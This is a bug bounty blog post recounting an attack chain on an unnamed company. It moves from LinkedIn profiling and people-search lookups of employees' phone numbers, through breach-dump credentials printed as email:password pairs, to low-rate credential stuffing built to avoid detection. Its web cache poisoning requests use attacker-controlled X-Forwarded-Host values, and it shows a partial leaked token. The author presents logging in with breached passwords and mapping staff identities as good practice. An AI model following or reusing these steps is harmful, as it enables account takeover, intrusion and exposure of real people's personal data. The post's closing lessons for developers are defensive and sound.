Hey there!😁

Life lesson #1: Never trust "I'll clean it later." Life lesson #2: "It's just OSINT" is the biggest lie developers tell themselves. Life lesson #3: If your password is from 2016… it's probably still working somewhere in 2026 😏 And life lesson #4: A bug bounty hunter with coffee and curiosity is more dangerous than a 0-day. ☕

🎯 The Target (a.k.a. "It Started Like Any Normal Day…")

I wasn't even planning to hunt seriously that day.

Opened my laptop, sipped coffee ☕, and thought:

"Let's just do some light recon… nothing crazy."

Yeah. Sure.

Fast forward 6 hours, I had:

• Employee phone numbers 📱
• Old credentials 🔑
• Internal email patterns 📧
• A cache poisoning vector 🧪
• And… access to sensitive data 😶‍🌫️

All from pure OSINT + chaining.

🧠 Phase 1: LinkedIn Recon — The Goldmine Nobody Sanitizes

Started with basic recon on LinkedIn.

What I looked for:

• Employees in IT / DevOps / Support
• Job posts mentioning:
• Tech stack (React, Node, AWS, etc.)
• Internal tools
• Email patterns in descriptions

Found:

firstname.lastname@company.com

Classic. Delicious. Predictable.

Also grabbed:

• Names
• Roles
• Locations

📱 Phase 2: Phone Number Pivot (The Underrated Move)

Took employee names → searched across public leaks & directories.

Then used: 👉 https://behindtheemail.com/

Boom 💥:

• Phone numbers
• Alternate emails
• Possible linked accounts

Now I had:

Name + Email + Phone Number

That's not recon anymore… that's identity mapping.

🔑 Phase 3: Old Password Dumps (Where People Get Lazy)

Then I hit: 👉 https://www.proxynova.com/tools/comb

Searched using:

• Email IDs
• Username patterns

Found:

tenyo.dsd@company.com : Password@123
tenyo: qwerty2120

And here's the thing…

👉 People reuse passwords. 👉 Companies forget old services. 👉 Legacy systems NEVER die.

🔐 Phase 4: Credential Stuffing (Soft Touch, No Noise)

Used Burp Suite Intruder (low rate to avoid detection):

Payload:

Cluster bomb attack:
- Emails list
- Passwords list

Target endpoints:

• /login
• /admin
• /api/auth

Result:

💥 Valid login on legacy subdomain

🌐 Phase 5: Subdomain & Surface Expansion

Mass recon time 🔎

Tools used:

subfinder
amass
httpx
katana

Command:

subfinder -d target.com | httpx -silent -status-code -title

Found:

uat.target.com
legacy.target.com
cdn.target.com

One stood out:

👉 cdn.target.com

⚠️ Phase 6: The "Harmless" Endpoint That Wasn't

While crawling:

katana -u https://target.com -depth 5

Found an endpoint:

/api/v1/config?region=us

Looked boring.

But response headers said:

X-Cache: HIT
Via: CDN

👀 Cacheable endpoint.

🧪 Phase 7: Web Cache Poisoning (Now We're Cooking)

Tested for cache poisoning.

Initial payload:

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Forwarded-Host: evil.com

Response reflected:

"base_url": "evil.com"

😏 Interesting.

Advanced Payload (Cache Key Confusion)

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Original-URL: /admin
X-Forwarded-Host: attacker.com

Cached Response:

• Reflected attacker-controlled host
• Served to other users

💣 Phase 8: Sensitive Data Leakage

Then I chained it.

Payload:

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Forwarded-Host: internal-api.target.local

Response:

"api_endpoint": "internal-api.target.local"
"auth_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

💀 Jackpot.

🕶️ Phase 9: Dark Web Correlation (The Spicy Part)

Took:

• Emails
• Passwords
• Tokens

Cross-checked with breach dumps (public sources & forums)

Found:

• Same employee emails in older breaches
• Password reuse confirmed
• Internal tools exposed in leaks

Realization:

This wasn't just a bug… This was a pattern of negligence.

🧰 Tools Used (My Arsenal)

• Burp Suite (Intruder, Repeater, Logger++)
• subfinder
• amass
• httpx
• katana
• proxynova (combo lists)
• behindtheemail (OSINT pivoting)

🧩 Final Chain (How It All Connected)

1. LinkedIn → Employee names
2. OSINT → Emails + phone numbers
3. Password dumps → Old credentials
4. Credential stuffing → Valid login
5. Recon → CDN endpoint
6. Cache poisoning → Controlled responses
7. Payload chaining → Internal API exposure
8. Data leak → Tokens + sensitive configs

🚨 Impact

• Internal API endpoints exposed
• Authentication tokens leaked
• User data potentially accessible
• Cache poisoning affecting multiple users
• Credential reuse vulnerability

🧠 Lessons Learned

For Developers:

• Stop reusing credentials across environments
• Sanitize ALL headers (X-Forwarded-* especially)
• Don't cache sensitive endpoints
• Kill legacy systems (seriously 😤)

For Hunters:

• OSINT is NOT "low impact"
• Chain everything
• Cache poisoning is still underrated
• Always test headers

🤯 Final Thought

This wasn't about hacking.

This was about:

Connecting dots nobody thought were connected.

A LinkedIn profile… A phone number… An old password… A misconfigured cache…

And suddenly…

💥 You're inside.

If you're still ignoring OSINT in bug bounty… You're leaving money on the table 💸

Connect with Me!

• Instagram: @rev_shinchan
• Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai😇

#BugBounty, #CyberSecurity, #InfoSec, #Hacking, #WebSecurity, #CTF